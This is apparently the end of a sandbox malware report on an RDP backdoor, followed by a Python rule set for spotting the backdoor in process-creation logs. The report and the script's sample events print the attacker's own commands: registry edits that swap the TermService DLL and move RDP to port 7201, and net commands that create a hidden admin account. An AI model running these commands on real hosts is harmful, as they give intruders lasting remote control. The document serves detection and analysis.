  2  C:\Windows\system32\net.exe (PID 3840)
     cmd: net user wgautilacc 111213
    3  C:\Windows\system32\net1.exe (PID 3864)
       cmd: C:\Windows\system32\net1 user wgautilacc 111213
  2  C:\Windows\system32\net.exe (PID 2784)
     cmd: net user wgautilacc /active:yes
    3  C:\Windows\system32\net1.exe (PID 3032)
       cmd: C:\Windows\system32\net1 user wgautilacc /active:yes

Read as a whole, the tree is an RDP backdoor install: move RDP to port 7201, swap the TermService DLL for a dropped file, start rdpdr and TermService, create the local account WgaUtilAcc (its password is changed twice during the run), put it and NETWORK SERVICE into Administrators and Remote Desktop Users, then run a second, NETWORK SERVICE-context PowerShell that fetches speed.ps1 from GitHub, after which the temp .ps1/.txt artefacts are deleted.
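The process tree above is a compact set of command lines to detect on. The following is an added example, not part of the sandbox report: a small rule set run over process-creation events (the shape a Sysmon event 1 or Security 4688 export would give after parsing) that flags each setup step seen here and then checks for the combination that characterises the backdoor, a swapped TermService DLL plus an account granted RDP or admin rights. The command lines tagged "report" in EVENTS are copied from the process tree; the two tagged "constructed" are made up for contrast (a legitimate termsrv.dll ServiceDll value and a harmless net query). The event field names, rule names and the pattern check are this example's own, not the sandbox's.

```python
"""Flag the RDP-backdoor setup steps from this report in process-creation
command lines (e.g. Sysmon event 1 / Security 4688 exports).

Added example, not part of the sandbox report. Command lines marked "report"
are copied from the report's process tree; those marked "constructed" are
made up for contrast. Field names, rule names and scoring are this example's own.
"""
import re
from typing import Dict, List, Optional

EVENTS: List[Dict] = [
    # report: reg.exe children of powershell.exe PID 3144
    {"pid": 3560, "cmd": r'"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f'},
    {"pid": 1592, "cmd": r'"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f'},
    {"pid": 2776, "cmd": r'"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f'},
    # report: account and service manipulation via net.exe
    {"pid": 2172, "cmd": r'"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add'},
    {"pid": 3852, "cmd": r"net start rdpdr"},
    {"pid": 2476, "cmd": r"net.exe user WgaUtilAcc 1fp0fXTo /add"},
    {"pid": 4044, "cmd": r'net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD'},
    {"pid": 3156, "cmd": r'net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD'},
    {"pid": 2784, "cmd": r"net user wgautilacc /active:yes"},
    # constructed: a legitimate ServiceDll value and a harmless net query
    {"pid": 9001, "cmd": r'reg add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\System32\termsrv.dll /f'},
    {"pid": 9002, "cmd": r"net user"},
]

# (rule name, regex over the command line); all matched case-insensitively.
# The optional quote after the image name covers '"...\net.exe" args' forms.
RULES = [
    ("rdp_port_changed", r'\breg(?:\.exe)?"?\s+add\b.*\\WinStations\\RDP-Tcp.*\bPortNumber\b'),
    ("termservice_servicedll_set", r'\breg(?:\.exe)?"?\s+add\b.*\\services\\TermService\\parameters\b.*\bServiceDLL\b'),
    ("wddm_driver_disabled", r'\breg(?:\.exe)?"?\s+add\b.*\bfEnableWddmDriver\b'),
    ("local_admin_group_add", r'\bnet(?:1|\.exe)?"?\s+localgroup\s+"?Administrators"?\s+.+?\s+/add\b'),
    ("rdp_users_group_add", r'\bnet(?:1|\.exe)?"?\s+localgroup\s+"Remote Desktop Users"\s+.+?\s+/add\b'),
    ("local_user_created", r'\bnet(?:1|\.exe)?"?\s+user\s+\S+\s+\S+\s+/add\b'),
    ("local_user_activated", r'\bnet(?:1|\.exe)?"?\s+user\s+\S+\s+/active:yes\b'),
    ("rdp_service_started", r'\bnet(?:1|\.exe)?"?\s+start\s+(?:TermService|rdpdr)\b'),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in RULES]


def rdp_port_from_cmd(cmd: str) -> Optional[int]:
    """Parse the /d value of a reg add (hex or decimal) into a port number."""
    m = re.search(r"/d\s+(0x[0-9a-f]+|\d+)\b", cmd, re.IGNORECASE)
    return int(m.group(1), 0) if m else None


def servicedll_is_hijacked(cmd: str) -> bool:
    """TermService should point at termsrv.dll; any other ServiceDll value is a swapped DLL."""
    m = re.search(r"/d\s+(\S+)", cmd, re.IGNORECASE)
    return bool(m) and not m.group(1).lower().endswith("termsrv.dll")


def scan(events: List[Dict]) -> List[Dict]:
    """Return one hit per (event, rule) match, enriched with port / hijack details."""
    hits = []
    for ev in events:
        for name, rx in COMPILED:
            if not rx.search(ev["cmd"]):
                continue
            hit = {"pid": ev["pid"], "rule": name, "cmd": ev["cmd"]}
            if name == "rdp_port_changed":
                hit["port"] = rdp_port_from_cmd(ev["cmd"])
            elif name == "termservice_servicedll_set":
                hit["hijacked"] = servicedll_is_hijacked(ev["cmd"])
            hits.append(hit)
    return hits


def rdp_backdoor_pattern(hits: List[Dict]) -> bool:
    """The chain seen here: a swapped TermService DLL plus an account given RDP or admin rights."""
    dll_swapped = any(h.get("hijacked") for h in hits)
    account_path = {h["rule"] for h in hits} & {
        "local_user_created", "local_admin_group_add", "rdp_users_group_add"}
    return dll_swapped and bool(account_path)


if __name__ == "__main__":
    for h in scan(EVENTS):
        print(h["pid"], h["rule"], h.get("port", ""), h.get("hijacked", ""))
    print("rdp backdoor pattern:", rdp_backdoor_pattern(scan(EVENTS)))
```

Single rules such as local_user_created or rdp_service_started fire on ordinary administration, which is why the verdict is left to rdp_backdoor_pattern: the ServiceDll check is the low-noise anchor (a TermService ServiceDll that is not termsrv.dll has no benign explanation), and the account rules add the context. On a live host the same facts can be read back directly from HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters\ServiceDll and ...\WinStations\RDP-Tcp\PortNumber.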